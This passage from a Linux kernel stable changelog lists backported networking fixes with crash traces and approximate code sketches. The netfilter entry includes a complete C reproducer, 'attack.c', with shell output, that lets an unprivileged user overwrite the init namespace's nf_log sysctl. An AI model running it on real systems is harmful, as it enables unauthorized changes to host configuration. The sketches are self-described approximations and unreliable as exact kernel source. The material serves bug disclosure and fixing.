0000000041b58ab3 ffffffff8479ab7d ffffffff8140beae ffffffff8140cd00
Call Trace:
[< inline >] __dump_stack lib/dump_stack.c:15
[<ffffffff81b474f4>] dump_stack+0xb3/0x10f lib/dump_stack.c:51
[<ffffffff8140c06a>] panic+0x1bc/0x39d kernel/panic.c:179
[<ffffffff8111125c>] __warn+0x1cc/0x1f0 kernel/panic.c:542
[<ffffffff8111144c>] warn_slowpath_null+0x2c/0x40 kernel/panic.c:585
[<ffffffff8389e5d9>] dccp_set_state+0x229/0x290 net/dccp/proto.c:83
[<ffffffff838a0aa2>] dccp_close+0x612/0xc10 net/dccp/proto.c:1016
[<ffffffff8316bf1f>] inet_release+0xef/0x1c0 net/ipv4/af_inet.c:415
[<ffffffff82b6e89e>] sock_release+0x8e/0x1d0 net/socket.c:570
[<ffffffff82b6e9f6>] sock_close+0x16/0x20 net/socket.c:1017
[<ffffffff815256ad>] __fput+0x29d/0x720 fs/file_table.c:208
[<ffffffff81525bb5>] ____fput+0x15/0x20 fs/file_table.c:244
[<ffffffff811727d8>] task_work_run+0xf8/0x170 kernel/task_work.c:116
[< inline >] exit_task_work include/linux/task_work.h:21
[<ffffffff8111bc53>] do_exit+0x883/0x2ac0 kernel/exit.c:828
[<ffffffff811221fe>] do_group_exit+0x10e/0x340 kernel/exit.c:931
[<ffffffff81143c94>] get_signal+0x634/0x15a0 kernel/signal.c:2307
[<ffffffff81054aad>] do_signal+0x8d/0x1a30 arch/x86/kernel/signal.c:807
[<ffffffff81003a05>] exit_to_usermode_loop+0xe5/0x130 arch/x86/entry/common.c:156
[< inline >] prepare_exit_to_usermode arch/x86/entry/common.c:190
[<ffffffff81006298>] syscall_return_slowpath+0x1a8/0x1e0 arch/x86/entry/common.c:259
[<ffffffff83fc1a62>] entry_SYSCALL_64_fastpath+0xc0/0xc2
Dumping ftrace buffer:
(ftrace buffer empty)
Kernel Offset: disabled
Fix this the same way we did for TCP in commit
565b7b2d2e63 ("tcp: do not send reset to already closed sockets")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Eric Dumazet [Sat, 29 Oct 2016 18:02:36 +0000 (11:02 -0700)]
net: mangle zero checksum in skb_checksum_help()
commit
4f2e4ad56a65f3b7d64c258e373cb71e8d2499f4 upstream.
Sending a zero checksum is OK for TCP, but not for UDP: a UDPv6 receiver
should by default drop a frame with a 0 checksum, and a UDPv4 receiver
would not verify the checksum and might accept a corrupted packet.
Simply replace such a checksum with 0xffff, regardless of transport.
This error was caught on SIT tunnels, but seems generic.
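A sketch of the substitution at the end of skb_checksum_help()
(surrounding lines approximate):
	/* A folded checksum of 0 would look like "no checksum" to UDP
	 * receivers; transmit the equivalent value 0xffff instead.
	 */
	*(__sum16 *)(skb->data + offset) = csum_fold(csum) ?: CSUM_MANGLED_0;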
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Maciej Żenczykowski <maze@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Acked-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Eric Dumazet [Fri, 28 Oct 2016 20:40:24 +0000 (13:40 -0700)]
net: clear sk_err_soft in sk_clone_lock()
commit
e551c32d57c88923f99f8f010e89ca7ed0735e83 upstream.
At accept() time, it is possible the parent has a non-zero sk_err_soft
left over from a prior error.
Make sure we do not leave this value in the child, as it makes future
getsockopt(SO_ERROR) calls quite unreliable.
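A sketch of the one-line reset in sk_clone_lock() (the neighbouring
assignments are shown for context only):
		newsk->sk_err	   = 0;
		newsk->sk_err_soft = 0;	/* don't inherit the parent's soft error */
		newsk->sk_priority = 0;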
Signed-off-by: Eric Dumazet <edumazet@google.com>
Acked-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Marcelo Ricardo Leitner [Tue, 25 Oct 2016 16:27:39 +0000 (14:27 -0200)]
sctp: validate chunk len before actually using it
commit
bf911e985d6bbaa328c20c3e05f4eb03de11fdd6 upstream.
Andrey Konovalov reported that KASAN detected SCTP reading a slab beyond
its boundaries. The cause was that, when handling out-of-the-blue
packets in sctp_sf_ootb(), the chunk length was checked only after the
first chunk had already been processed, so it was validated only for the
2nd and subsequent chunks.
The fix is simply to move the check up so the 1st chunk is validated as
well.
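A sketch of the reordered loop in sctp_sf_ootb() (helper and macro names
vary between kernel versions; this is not the exact upstream diff):
	do {
		/* Validate the chunk length before touching the chunk, so
		 * the very first chunk is covered too.
		 */
		ch_end = ((__u8 *)ch) + WORD_ROUND(ntohs(ch->length));
		if (ch_end > skb_tail_pointer(skb))
			return sctp_sf_violation_chunklen(ep, asoc, type,
							  arg, commands);

		/* ... per-chunk processing ... */

		ch = (sctp_chunkhdr_t *)ch_end;
	} while (ch_end < skb_tail_pointer(skb));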
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Reviewed-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Jiri Slaby [Fri, 21 Oct 2016 12:13:24 +0000 (14:13 +0200)]
net: sctp, forbid negative length
commit
a4b8e71b05c27bae6bad3bdecddbc6b68a3ad8cf upstream.
Most getsockopt handlers in net/sctp/socket.c check len against the
sizeof some structure, like:
	if (len < sizeof(int))
		return -EINVAL;
At first glance the check seems correct. But since len is an int and
sizeof returns a size_t, the int gets promoted to the unsigned size_t
too, so the test is false for negative lengths. Yes, (-1 < sizeof(long))
is false.
Fix this in sctp by explicitly checking len < 0 before any getsockopt
handler is called.
Note that sctp_getsockopt_events() already handled the negative case.
Since we now add the < 0 check earlier, that one can be removed.
If not checked, this is the result:
UBSAN: Undefined behaviour in ../mm/page_alloc.c:2722:19
shift exponent 52 is too large for 32-bit type 'int'
CPU: 1 PID: 24535 Comm: syz-executor Not tainted 4.8.1-0-syzkaller #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.1-0-gb3ef39f-prebuilt.qemu-project.org 04/01/2014
0000000000000000 ffff88006d99f2a8 ffffffffb2f7bdea 0000000041b58ab3
ffffffffb4363c14 ffffffffb2f7bcde ffff88006d99f2d0 ffff88006d99f270
0000000000000000 0000000000000000 0000000000000034 ffffffffb5096422
Call Trace:
[<ffffffffb3051498>] ? __ubsan_handle_shift_out_of_bounds+0x29c/0x300
...
[<ffffffffb273f0e4>] ? kmalloc_order+0x24/0x90
[<ffffffffb27416a4>] ? kmalloc_order_trace+0x24/0x220
[<ffffffffb2819a30>] ? __kmalloc+0x330/0x540
[<ffffffffc18c25f4>] ? sctp_getsockopt_local_addrs+0x174/0xca0 [sctp]
[<ffffffffc18d2bcd>] ? sctp_getsockopt+0x10d/0x1b0 [sctp]
[<ffffffffb37c1219>] ? sock_common_getsockopt+0xb9/0x150
[<ffffffffb37be2f5>] ? SyS_getsockopt+0x1a5/0x270
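A sketch of the centralised check at the top of sctp_getsockopt()
(surrounding lines approximate):
	if (get_user(len, optlen))
		return -EFAULT;

	/* len is a signed int; reject negative values here, before the
	 * per-option "len < sizeof(...)" comparisons promote it to an
	 * unsigned type.
	 */
	if (len < 0)
		return -EINVAL;

	lock_sock(sk);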
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Cc: Vlad Yasevich <vyasevich@gmail.com>
Cc: Neil Horman <nhorman@tuxdriver.com>
Cc: "David S. Miller" <davem@davemloft.net>
Cc: linux-sctp@vger.kernel.org
Cc: netdev@vger.kernel.org
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Anoob Soman [Wed, 5 Oct 2016 14:12:54 +0000 (15:12 +0100)]
packet: call fanout_release, while UNREGISTERING a netdev
commit
6664498280cf17a59c3e7cf1a931444c02633ed1 upstream.
If a socket has the PACKET_FANOUT sockopt set, a new prot_hook is
registered as part of fanout_add(). When a NETDEV_UNREGISTER event is
processed in af_packet, __fanout_unlink() is called for all sockets, but
the prot_hook that was registered in fanout_add() is not removed. Call
fanout_release() on NETDEV_UNREGISTER, which removes that prot_hook and
removes the fanout from the fanout_list.
This fixes BUG_ON(!list_empty(&dev->ptype_specific)) in netdev_run_todo().
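A sketch of the idea in packet_notifier() (the exact interaction with
__fanout_unlink() in the real patch may differ):
	case NETDEV_UNREGISTER:
		/* ... mclist handling ... */
		if (po->fanout) {
			__fanout_unlink(sk, po);
			fanout_release(sk);	/* drop the fanout prot_hook too */
		}
		/* ... rest of the UNREGISTER handling ... */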
Signed-off-by: Anoob Soman <anoob.soman@citrix.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Nikolay Aleksandrov [Sun, 25 Sep 2016 21:08:31 +0000 (23:08 +0200)]
ipmr, ip6mr: fix scheduling while atomic and a deadlock with ipmr_get_route
commit
2cf750704bb6d7ed8c7d732e071dd1bc890ea5e8 upstream.
Since the commit below, the ipmr/ip6mr rtnl_unicast() code uses the
portid instead of the previous dst_pid, which was copied from in_skb's
portid. Since the skb is new, the portid is 0 at that point, so the
packets are sent to the kernel and we get scheduling while atomic or a
deadlock (depending on where it happens) by trying to acquire rtnl
twice.
Also, since this is RTM_GETROUTE, it can be triggered by a normal user.
Here's the sleeping while atomic trace:
[ 7858.212557] BUG: sleeping function called from invalid context at kernel/locking/mutex.c:620
[ 7858.212748] in_atomic(): 1, irqs_disabled(): 0, pid: 0, name: swapper/0
[ 7858.212881] 2 locks held by swapper/0/0:
[ 7858.213013] #0: (((&mrt->ipmr_expire_timer))){+.-...}, at: [<ffffffff810fbbf5>] call_timer_fn+0x5/0x350
[ 7858.213422] #1: (mfc_unres_lock){+.....}, at: [<ffffffff8161e005>] ipmr_expire_process+0x25/0x130
[ 7858.213807] CPU: 0 PID: 0 Comm: swapper/0 Not tainted 4.8.0-rc7+ #179
[ 7858.213934] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.7.5-20140531_083030-gandalf 04/01/2014
[ 7858.214108] 0000000000000000 ffff88005b403c50 ffffffff813a7804 0000000000000000
[ 7858.214412] ffffffff81a1338e ffff88005b403c78 ffffffff810a4a72 ffffffff81a1338e
[ 7858.214716] 000000000000026c 0000000000000000 ffff88005b403ca8 ffffffff810a4b9f
[ 7858.215251] Call Trace:
[ 7858.215412] <IRQ> [<ffffffff813a7804>] dump_stack+0x85/0xc1
[ 7858.215662] [<ffffffff810a4a72>] ___might_sleep+0x192/0x250
[ 7858.215868] [<ffffffff810a4b9f>] __might_sleep+0x6f/0x100
[ 7858.216072] [<ffffffff8165bea3>] mutex_lock_nested+0x33/0x4d0
[ 7858.216279] [<ffffffff815a7a5f>] ? netlink_lookup+0x25f/0x460
[ 7858.216487] [<ffffffff8157474b>] rtnetlink_rcv+0x1b/0x40
[ 7858.216687] [<ffffffff815a9a0c>] netlink_unicast+0x19c/0x260
[ 7858.216900] [<ffffffff81573c70>] rtnl_unicast+0x20/0x30
[ 7858.217128] [<ffffffff8161cd39>] ipmr_destroy_unres+0xa9/0xf0
[ 7858.217351] [<ffffffff8161e06f>] ipmr_expire_process+0x8f/0x130
[ 7858.217581] [<ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
[ 7858.217785] [<ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
[ 7858.217990] [<ffffffff810fbc95>] call_timer_fn+0xa5/0x350
[ 7858.218192] [<ffffffff810fbbf5>] ? call_timer_fn+0x5/0x350
[ 7858.218415] [<ffffffff8161dfe0>] ? ipmr_net_init+0x180/0x180
[ 7858.218656] [<ffffffff810fde10>] run_timer_softirq+0x260/0x640
[ 7858.218865] [<ffffffff8166379b>] ? __do_softirq+0xbb/0x54f
[ 7858.219068] [<ffffffff816637c8>] __do_softirq+0xe8/0x54f
[ 7858.219269] [<ffffffff8107a948>] irq_exit+0xb8/0xc0
[ 7858.219463] [<ffffffff81663452>] smp_apic_timer_interrupt+0x42/0x50
[ 7858.219678] [<ffffffff816625bc>] apic_timer_interrupt+0x8c/0xa0
[ 7858.219897] <EOI> [<ffffffff81055f16>] ? native_safe_halt+0x6/0x10
[ 7858.220165] [<ffffffff810d64dd>] ? trace_hardirqs_on+0xd/0x10
[ 7858.220373] [<ffffffff810298e3>] default_idle+0x23/0x190
[ 7858.220574] [<ffffffff8102a20f>] arch_cpu_idle+0xf/0x20
[ 7858.220790] [<ffffffff810c9f8c>] default_idle_call+0x4c/0x60
[ 7858.221016] [<ffffffff810ca33b>] cpu_startup_entry+0x39b/0x4d0
[ 7858.221257] [<ffffffff8164f995>] rest_init+0x135/0x140
[ 7858.221469] [<ffffffff81f83014>] start_kernel+0x50e/0x51b
[ 7858.221670] [<ffffffff81f82120>] ? early_idt_handler_array+0x120/0x120
[ 7858.221894] [<ffffffff81f8243f>] x86_64_start_reservations+0x2a/0x2c
[ 7858.222113] [<ffffffff81f8257c>] x86_64_start_kernel+0x13b/0x14a
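A sketch of the idea behind the fix (function signatures vary between
kernel versions and are shown here only for illustration): the
RTM_GETROUTE handler passes the requester's netlink portid down into
ipmr_get_route()/ip6mr_get_route(), which stamps it on the newly built
skb, so later rtnl_unicast() replies go back to the requesting socket
instead of to portid 0, the kernel.
	int ipmr_get_route(struct net *net, struct sk_buff *skb,
			   __be32 saddr, __be32 daddr,
			   struct rtmsg *rtm, int nowait, u32 portid)
	{
		/* ... */
		/* the skb queued for an unresolved entry now carries the
		 * requester's portid instead of the implicit 0
		 */
		NETLINK_CB(skb2).portid = portid;
		/* ... */
	}

	/* caller, in the RTM_GETROUTE path:
	 *	ipmr_get_route(net, skb, ..., NETLINK_CB(in_skb).portid);
	 */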
Fixes:
2942e9005056 ("[RTNETLINK]: Use rtnl_unicast() for rtnetlink unicasts")
Signed-off-by: Nikolay Aleksandrov <nikolay@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Eric Dumazet [Thu, 15 Sep 2016 15:48:46 +0000 (08:48 -0700)]
net: avoid sk_forward_alloc overflows
commit
20c64d5cd5a2bdcdc8982a06cb05e5e1bd851a3d upstream.
A malicious TCP receiver, sending SACK, can force the sender to split
skbs in its write queue and increase its memory usage.
Then, when the socket is closed and its write queue purged, we might
overflow sk_forward_alloc (it becomes negative).
sk_mem_reclaim() does nothing in this case, and more than 2GB is leaked
from TCP's perspective (tcp_memory_allocated is not changed).
Warnings then trigger from inet_sock_destruct() and
sk_stream_kill_queues() on seeing a non-zero sk_forward_alloc, and the
whole TCP stack can get stuck because TCP is under memory pressure.
A simple fix is to reclaim preemptively from sk_mem_uncharge(). This
makes sure a socket won't have more than 2 MB forward allocated after a
burst followed by an idle period.
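A sketch of the preemptive reclaim, using the thresholds described above
(the reclaim helper's exact signature varies by kernel version):
static inline void sk_mem_uncharge(struct sock *sk, int size)
{
	if (!sk_has_account(sk))
		return;
	sk->sk_forward_alloc += size;

	/* Reclaim once 2 MB of forward allocation is reached, so repeated
	 * uncharges can no longer drive sk_forward_alloc towards overflow.
	 */
	if (unlikely(sk->sk_forward_alloc >= 1 << 21))
		__sk_mem_reclaim(sk, 1 << 20);
}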
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Eric Dumazet [Fri, 15 May 2015 19:39:25 +0000 (12:39 -0700)]
net: fix sk_mem_reclaim_partial()
commit
1a24e04e4b50939daa3041682b38b82c896ca438 upstream.
The goal of sk_mem_reclaim_partial() is to ensure each socket keeps one
SK_MEM_QUANTUM of forward allocation. This is needed both for
performance and for better handling of memory pressure situations in
follow-up patches.
SK_MEM_QUANTUM is currently a page, but might be reduced to 4096 bytes,
as some arches have 64KB pages.
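One possible shape of the corrected helper (a sketch under the
assumption that the reclaim primitive takes an amount to release; not
necessarily the exact upstream diff):
static inline void sk_mem_reclaim_partial(struct sock *sk)
{
	if (!sk_has_account(sk))
		return;
	/* Release everything beyond a minimal remainder so that, after
	 * rounding to SK_MEM_QUANTUM units, the socket is left holding at
	 * most one quantum of forward allocation.
	 */
	if (sk->sk_forward_alloc > 1)
		__sk_mem_reclaim(sk, sk->sk_forward_alloc - 1);
}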
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Oliver Hartkopp [Mon, 24 Oct 2016 19:11:26 +0000 (21:11 +0200)]
can: bcm: fix warning in bcm_connect/proc_register
commit
deb507f91f1adbf64317ad24ac46c56eeccfb754 upstream.
Andrey Konovalov reported an issue with proc_register in bcm.c.
As suggested by Cong Wang, this patch adds lock_sock() protection and a
check for an unsuccessful proc_create_data() in bcm_connect().
Reference: http://marc.info/?l=linux-netdev&m=147732648731237
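A sketch of the two changes in bcm_connect() (member and helper names
approximate, error-path details simplified):
	lock_sock(sk);
	/* ... */
	/* unique socket address as filename */
	sprintf(bo->procname, "%lu", sock_i_ino(sk));
	bo->bcm_proc_read = proc_create_data(bo->procname, 0644, proc_dir,
					     &bcm_proc_fops, sk);
	if (!bo->bcm_proc_read) {
		ret = -ENOMEM;
		goto fail;
	}
	/* ... */
	release_sock(sk);
	return ret;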
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Suggested-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: Oliver Hartkopp <socketcan@hartkopp.net>
Acked-by: Cong Wang <xiyou.wangcong@gmail.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marc Kleine-Budde <mkl@pengutronix.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Jann Horn [Sun, 18 Sep 2016 19:40:55 +0000 (21:40 +0200)]
netfilter: fix namespace handling in nf_log_proc_dostring
commit
dbb5918cb333dfeb8897f8e8d542661d2ff5b9a0 upstream.
nf_log_proc_dostring() used current's network namespace instead of the
one corresponding to the sysctl file the write was performed on. Because
the permission check happens at open time and the nf_log files in
namespaces are accessible to the namespace owner, this can be abused by
an unprivileged user to effectively write to the init namespace's nf_log
sysctls.
Stash the "struct net *" in extra2; data and extra1 are already used.
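A sketch of the stashing (registration-side and handler-side fragments;
surrounding code omitted):
	/* when the per-namespace nf_log sysctl table is set up */
	table[i].extra2 = net;

	/* in nf_log_proc_dostring(), use the stashed namespace instead of
	 * current's
	 */
	struct net *net = table->extra2;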
Repro code:
#define _GNU_SOURCE
#include <stdlib.h>
#include <sched.h>
#include <err.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
char child_stack[1000000];
uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;

void writefile(char *path, char *buf) {
	int fd = open(path, O_WRONLY);
	if (fd == -1)
		err(1, "unable to open thing");
	if (write(fd, buf, strlen(buf)) != strlen(buf))
		err(1, "unable to write thing");
	close(fd);
}

int child_fn(void *p_) {
	if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
		  NULL))
		err(1, "mount");

	/* Yes, we need to set the maps for the net sysctls to recognize us
	 * as namespace root.
	 */
	char buf[1000];
	sprintf(buf, "0 %d 1\n", (int)outer_uid);
	writefile("/proc/1/uid_map", buf);
	writefile("/proc/1/setgroups", "deny");
	sprintf(buf, "0 %d 1\n", (int)outer_gid);
	writefile("/proc/1/gid_map", buf);

	stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
	if (stolen_fd == -1)
		err(1, "open nf_log");
	return 0;
}

int main(void) {
	outer_uid = getuid();
	outer_gid = getgid();

	int child = clone(child_fn, child_stack + sizeof(child_stack),
			  CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
			  |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
	if (child == -1)
		err(1, "clone");
	int status;
	if (wait(&status) != child)
		err(1, "wait");
	if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
		errx(1, "child exit status bad");

	char *data = "NONE";
	if (write(stolen_fd, data, strlen(data)) != strlen(data))
		err(1, "write");
	return 0;
}
Repro:
$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE
Because this looks like an issue with very low severity, I'm sending it to
the public list directly.
Signed-off-by: Jann Horn <jann@thejh.net>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Stefan Richter [Sun, 30 Oct 2016 16:32:01 +0000 (17:32 +0100)]
firewire: net: fix fragmented datagram_size off-by-one
commit
e9300a4b7bbae83af1f7703938c94cf6dc6d308f upstream.
RFC 2734 defines the datagram_size field in fragment encapsulation
headers thus:
datagram_size: The encoded size of the entire IP datagram. The
value of datagram_size [...] SHALL be one less than the value of
Total Length in the datagram's IP header (see STD 5, RFC 791).
Accordingly, the eth1394 driver of Linux 2.6.36 and older set and got
this field with a -/+1 offset:
	ether1394_tx() /* transmit */
	  ether1394_encapsulate_prep()
	    hdr->ff.dg_size = dg_size - 1;

	ether1394_data_handler() /* receive */
	  if (hdr->common.lf == ETH1394_HDR_LF_FF)
	    dg_size = hdr->ff.dg_size + 1;
	  else
	    dg_size = hdr->sf.dg_size + 1;
Likewise, I observe OS X 10.4 and Windows XP Pro SP3 transmitting
1500-byte datagrams in fragments with datagram_size=1499 if link
fragmentation is required.
Only firewire-net sets and gets datagram_size without this offset. The
result is a lack of interoperability between firewire-net and OS X,
Windows XP, and presumably Linux' eth1394. (I did not test with the
latter.)
For example, FTP data transfers to a Linux firewire-net box with max_rec
smaller than the 1500-byte MTU
- from OS X fail entirely,
- from Win XP start out with a bunch of fragmented datagrams which
time out, then continue with unfragmented datagrams because Win XP
temporarily reduces the MTU to 576 bytes.
So let's fix firewire-net's datagram_size accessors.
Note that firewire-net thereby loses interoperability with unpatched
firewire-net, but only if link fragmentation is employed. (This happens
with large broadcast datagrams, and with large datagrams on several
FireWire CardBus cards with smaller max_rec than equivalent PCI cards,
and it can be worked around by setting a small enough MTU.)
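A sketch of the corresponding -1/+1 adjustment in firewire-net's
fragment-header accessors (macro names and the exact bit layout are
illustrative, not the upstream diff):
/* wire field -> IP Total Length */
#define fwnet_get_hdr_dg_size(h)	((((h)->w0 & 0x0fff0000) >> 16) + 1)
/* IP Total Length -> wire field */
#define fwnet_set_hdr_dg_size(dgs)	(((dgs) - 1) << 16)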
Signed-off-by: Stefan Richter <stefanr@s5r6.in-berlin.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>